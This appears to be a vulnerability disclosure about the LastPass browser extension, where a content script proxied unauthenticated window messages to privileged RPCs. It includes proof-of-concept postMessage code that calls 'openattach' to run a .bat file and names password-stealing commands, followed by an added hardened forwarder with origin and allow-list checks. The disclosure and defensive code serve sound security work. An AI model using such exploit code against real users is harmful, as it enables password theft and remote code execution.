I noticed this entry in the content_script array from the LastPass manifest:

    {
        "matches": [ "https://1min-ui-prod.service.lastpass.com/*" ],
        "js": [ "1minsignup/chrome/websiteConnector.js" ],
        "all_frames": true,
        "run_at": "document_end"
    },

That's a content script that is only used for one specific lastpass.com domain. If we look at the script:

    $ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
    ...
    window.addEventListener("message", function(e) {
        e.data.fromExtension || chrome.runtime.sendMessage(e.data, function(e) {});
    });

That doesn't look good: this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do

    win = window.open("https://1min-ui-prod.service.lastpass.com/");
    win.postMessage({}, "*");

Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc). If you install the binary component (https://lastpass.com/support.php?cmd=showfaq&id=5576), you can also use "openattach" to run arbitrary code. For example, this will run calc.exe:

    win = window.open("https://1min-ui-prod.service.lastpass.com/");
    win.postMessage({
        fromExtension: false,
        cmd: "openattach",
        attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec",
        data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==",
        mimetype: "other:.bat"
    }, "*");

(This code will need to be inside an onclick handler to open a popup.)

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
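The root cause above is a `message` listener that forwards any window message to the extension without checking who sent it. The block below is an added example, not LastPass's code or the actual patch, showing the hardened shape such a forwarder should have: verify `event.origin` against the single origin the content script is injected for, validate the payload is an object, and only forward commands from an explicit allow-list. The command names `signup_started` and `signup_complete`, the origin `https://attacker.example`, and the fake window used to run the code outside a browser are all assumptions constructed for the example.

```javascript
// Added example (not LastPass's code): a hardened version of the message
// forwarder quoted in the report. The original forwarded every window
// message whose data lacked a truthy `fromExtension` field. This version
// checks the sender's origin, the shape of the message and a command
// allow-list before anything would reach chrome.runtime.sendMessage.

// The only origin this content script is injected for, taken from the
// manifest entry quoted in the report.
const TRUSTED_ORIGIN = "https://1min-ui-prod.service.lastpass.com";

// Hypothetical allow-list of commands the signup page legitimately needs.
// The names are an assumption; the point is that privileged RPCs such as
// "openattach" or "copypass" are never reachable through this listener.
const ALLOWED_COMMANDS = new Set(["signup_started", "signup_complete"]);

// Decide whether a MessageEvent may be forwarded to the extension.
// Returns a string naming the rejection reason, or null to allow, so the
// caller can log why a message was dropped.
function rejectReason(event, trustedOrigin = TRUSTED_ORIGIN, allowed = ALLOWED_COMMANDS) {
  // 1. Origin check: a popup opened from another site and postMessage'd
  //    with "*" arrives with event.origin set to that other site.
  if (event.origin !== trustedOrigin) return "untrusted origin";

  // 2. Shape check: the original dereferenced e.data.fromExtension without
  //    confirming that data is an object at all.
  const data = event.data;
  if (typeof data !== "object" || data === null) return "non-object payload";
  if (data.fromExtension) return "echo from extension";

  // 3. Command allow-list: only named, expected commands are forwarded.
  if (typeof data.cmd !== "string" || !allowed.has(data.cmd)) return "command not allowed";

  return null;
}

// Wire the policy into a message listener. `win` and `sendMessage` are
// injected so the function can be exercised outside a browser; in a real
// content script they would be `window` and `chrome.runtime.sendMessage`.
function installForwarder(win, sendMessage, log = () => {}) {
  win.addEventListener("message", (event) => {
    const reason = rejectReason(event);
    if (reason !== null) {
      log(`dropped message from ${event.origin}: ${reason}`);
      return;
    }
    sendMessage(event.data, () => {});
  });
}

// Minimal stand-in for a window so the block runs under Node (assumption).
function makeFakeWindow() {
  const listeners = [];
  return {
    addEventListener(type, fn) { if (type === "message") listeners.push(fn); },
    dispatch(event) { listeners.forEach((fn) => fn(event)); },
  };
}

// Demonstration with constructed events (not captured traffic).
function demo() {
  const forwarded = [];
  const dropped = [];
  const win = makeFakeWindow();
  installForwarder(win, (msg) => forwarded.push(msg), (line) => dropped.push(line));

  // From an untrusted opener, in the shape of the report's proof of concept.
  win.dispatch({ origin: "https://attacker.example", data: { fromExtension: false, cmd: "openattach" } });
  // Right origin, but a privileged command the signup page never needs.
  win.dispatch({ origin: TRUSTED_ORIGIN, data: { cmd: "copypass" } });
  // Right origin, expected command: the only one that is forwarded.
  win.dispatch({ origin: TRUSTED_ORIGIN, data: { cmd: "signup_complete" } });
  // Right origin, malformed payload that would have thrown in the original.
  win.dispatch({ origin: TRUSTED_ORIGIN, data: null });

  return { forwarded, dropped };
}
```

Of the four constructed messages in `demo()`, only the `signup_complete` one is forwarded; the other three are logged with their rejection reason. The origin check alone would have closed the report's bug, but the allow-list is what keeps a future bug on the trusted page from turning into the same full RPC exposure.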
LastPass RCE vulnerability fixed